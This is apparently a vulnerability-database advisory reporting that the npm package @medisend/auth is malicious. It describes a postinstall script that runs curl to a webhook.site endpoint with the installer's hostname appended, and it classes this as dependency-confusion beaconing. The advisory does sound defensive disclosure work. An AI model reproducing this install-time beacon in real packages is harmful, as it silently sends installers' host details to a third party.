VDB
KO

MAL-2026-14421

Malicious code in @medisend/auth (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8363fc41a00733469f69df79f45ecebd190ac85d16d8cbdd48a61fe5bfb67003) package.json declares a postinstall lifecycle script that runs `curl` against https://webhook.site/74ed1be3-96d6-48c3-932b-6b1dbabaff97 with the installer's hostname appended as a query parameter (`?pkg=medisend-auth-$(hostname)`). On `npm install`, this fires automatically and transmits an installer-identifying host indicator to a third-party anonymous collector endpoint controlled by whoever holds the webhook.site token. The @medisend/* scope and the package name pattern are consistent with dependency-confusion beaconing against an internal namespace.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / @medisend/auth

No fixed version published yet for @medisend/auth (npm). Pin to a known-safe version or switch to an alternative.

References